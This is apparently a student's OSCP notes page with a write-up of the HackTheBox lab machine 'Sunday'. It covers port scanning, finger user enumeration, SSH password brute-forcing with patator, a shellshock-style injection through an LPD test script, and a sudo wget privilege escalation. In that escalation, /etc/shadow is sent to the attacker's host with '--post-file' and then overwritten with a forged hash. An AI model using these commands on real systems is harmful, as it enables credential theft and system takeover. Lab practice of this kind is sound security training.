O
O
OSCP Notes
Search…
HTB Write-up Sunday
What I learned today:
Nmap: -p- --max-retries 1 (or 0) - this speeds up the all port scan a bit.
it revealed some usernames on the service with the finger-user-enum tool.
ssh: add keyalgorithm with -okexAlgorithms=+ALGORITHM_ NAME
By using |less -s kills off line wrapping (otherwise, the output is too messy)
For ssh password cracking, use patator
sytax:
patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg='Authentication failed.'
Wget
  • wget -i to read files
  • wget --post-file=FILE_PATH IP to upload a file to kali (nc open on 80)
Create a hash
openssl passwd -5 -salt thesalt pass123
Regular enumuration won't show the extra ports that are open which includes SSH port.
do -p- scan even though it takes forever (speed it up by doing -p- --max-retries 1 (or 0) ---> once we find weird ports, do port-specific scan like
nmap -sC -sV -p 79,111,22022,35342,56252 -oA targeted_scan IP_address
Enumeration-
For finger enum, I used
finger-user-enum
pentestmonkey
For usernames, used /usr/share/seclists/Usernames/Names/names.txt
Syntax:
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.159.222 |less -S
By using |less -s kills off line wrapping (otherwise, the output is too messy)
We got sammy and sunny
We can try to ssh into it. The password for sammy account was sunny.
When you try to login, it might give this error;
"No matching key exchange method found. Their offer : ~"
Try to add the key algorithm with "-okexAlgorithms=+ALGORITHM_ NAME"
Now we are in.

SSH Password Cracking

For ssh password cracking, use patator
sytax:
patator ssh_login host=10.129.160.144 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/ persistent=0 -x ignore:mesg='Authentication failed.'
use a password list that's not too big or create your own password list.
515 printer
515 - Pentesting Line Printer Daemon (LPD)
HackTricks
Found info about LPD here and tried it but didn't get the result - negative acknowledgement. \
oh wait...
python lpdtest.py 10.129.159.222 in '() {:;}; ping -c1 10.10.14.125'
I used the above command and it executed it...
Does that mean we can get the shell back?
--- didn't work.

Priv Esc

When looking into the files, we found a backup file.
found a shadow file.
Crack the hash with hashcat: hashcat -m 7400 hash.txt rockyou.txt
Cracked the password for summy.
\
Switched user to sammy with the password.
Now it's showing that the system name - SunOS 5.11 -maybe vulnerable to shellshock?
Random='() { :;}; echo nyannyannyan' bash -c:
If this worked it's possible that the system is vulnerable to shellshock
sudo -l to check if any environmental valuables are kept.
no env valuables.
do env and just pick one to use.
Looks like it's not vulnerable this time.
When checking sammy's sudo -l,
wget is available. wget -h to see all the options we could use:
wget -i enabled us to see root files.
Create a file called "troll" with content like below.
#!/usr/bin/bash
bash
Upload it with the sammy account:
sudo wget http://10.10.14.131/troll -O /root/troll
and switch back to sunny to execute it(who has sudo access)
In this particular box, there's a task that's overwriting the file.
to prevent this,
let's have two ssh sessions open: one from the sammy (Wget to upload the file) and one from Sunny(to execute the file)
and on sammy, use
sleep5; sudo wget 10.10.14.131/troll -O /root/troll
to make the system sleep for 5 seconds, and then quickly run the file on the sammy
for some reason, I couldn't execute the /root/troll, I'm going to try another method.
Used sudo wget --post-file=/etc/shadow 10.10.14.131 to upload the shadow file to kali (nc open on 80)
Created a new file called shadow:
Create a new hash
openssl passwd -5 -salt thesalt pass123
Paste the hash to the top
Upload the shadow file to sammy account
sudo wget 10.10.14.131/shadow /etc/shadow
We can confirm that the shadow file got updated here.
With the new pass, I got in!
Copy link
Outline
SSH Password Cracking
Priv Esc